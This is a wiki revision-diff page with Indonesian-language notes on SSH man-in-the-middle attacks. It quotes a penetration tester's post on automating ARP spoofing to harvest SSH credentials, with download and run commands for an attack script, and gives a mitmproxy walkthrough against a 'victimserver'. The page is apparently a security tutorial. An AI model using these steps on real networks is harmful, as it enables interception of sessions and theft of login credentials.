Difference between revisions of "MITM: mitmssh"

From OnnoWiki
Jump to navigation Jump to search
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
sumber: https://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/
+
sumber: https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/
  
 +
# Download mitmproxy
 +
git clone https://github.com/mitmproxy/mitmproxy.git
  
'''CATATAN:''' SUSAH!!
+
#Generate mitm keys (these go to ~/.mitmkeys)
 +
./mitmkeys
  
  
 +
Now you want to install the SSH key you just generated to the server you want to mitm.
  
 +
#Install SSH key
 +
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
  
 +
Then run the proxy, pointing it at the victimserver.
  
 +
#Run proxy
 +
./mitmproxy_ssh -H victimserver
  
 +
This runs the proxy on localhost:2222
  
 +
Now simply connect to the local proxy:
  
Recently during an internal penetration test, I was performing ARP spoofing and i discovered a SSH connection from the administrator computer to another box.
+
ssh localhost -p 2222
  
That sounds like the correct way to access remote hosts securely. However, the problem was that the company was using a network switch that was vulnerable to ARP spoofing.
+
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.
  
I came across the below article about performing ARP spoofing and MITM SSH connections to steal credentials.
 
  
When performing arp spoofing and performing a mitm attack on SSH, the victim does get an alert message saying that there is a key mismatch but most people just ignore them anyway.
 
  
Below is the link to the original article.
 
http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/
 
 
In the article, the author demonstrates the use of a software called JMITM2 (http://www.david-guembel.de/index.php?id=6) which is sort of like a honey pot that proxies SSH connections between the victim and the target SSH server.
 
 
However, there are a number of steps to be done manually to execute this attack during an internal penetration test.
 
 
# Check if network is vulnerable to ARP spoofing
 
# Check if there are any active SSH connections in the network
 
# Identify the victim computer and SSH server
 
# Modify the configuration files of JMITM2
 
# Modifying iptables
 
# ARP spoofing
 
# Checking JMITM2 console for credentials
 
# Re-arp the router and victim host with the correct MAC addresses of each.
 
 
It would save a great amount of time to automate these steps. I wrote a script that does just that.
 
 
Running the command below checks the network for active SSH connections (via ARP spoofing) and then automates the whole attack to outputs any credentials captured to the console.
 
 
python2.7 mitmSSH.py -analyze
 
 
If you know the victim host IP and SSH server, you can use the below command
 
 
python2.7 mitmSSH.py -host victims -ssh sshServerIP
 
 
IMG_2025.PNG
 
This script has only been tested on Kali Linux.
 
 
There are a couple of things that are still in the works to improve the script.
 
1. Switching from intercepter-ng for ARP spoofing to scapy.
 
 
The script can be grabbed from the below link
 
https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py
 
 
 
==Download==
 
 
wget https://raw.githubusercontent.com/milo2012/pentest_automation/master/mitmSSH.py
 
 
mkdir /tmp/tools
 
cd /tmp/tools
 
wget https://github.com/intercepter-ng/mirror/archive/master.zip
 
unzip master.zip
 
mv /tmp/tools/mirror-master/* /tmp/tools/
 
unzip Intercepter-NG.CE.05.zip
 
 
==Edit source==
 
 
* line 1: rom > from
 
* line currentPath="/tmp1/tools" > currentPath="/tmp/tools"
 
 
Lakukan
 
 
mkdir /tmp/tools
 
  
 
==Referensi==
 
==Referensi==
  
 +
* https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/
 
* https://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/
 
* https://milo2012.wordpress.com/2014/11/12/automating-man-in-the-middle-sshv2-attacks/
 
* https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py
 
* https://github.com/milo2012/pentest_automation/blob/master/mitmSSH.py
 
* http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/
 
* http://woff.hu/tools/ssh2-mitm-like-attack-with-jmitm2/

Latest revision as of 09:31, 3 October 2018

sumber: https://andrewmichaelsmith.com/2014/03/quick-and-easy-ssh-mitm/

# Download mitmproxy
git clone https://github.com/mitmproxy/mitmproxy.git
#Generate mitm keys (these go to ~/.mitmkeys)
./mitmkeys


Now you want to install the SSH key you just generated to the server you want to mitm.

#Install SSH key
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver

Then run the proxy, pointing it at the victimserver.

#Run proxy
./mitmproxy_ssh -H victimserver

This runs the proxy on localhost:2222

Now simply connect to the local proxy:

ssh localhost -p 2222

And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.



Referensi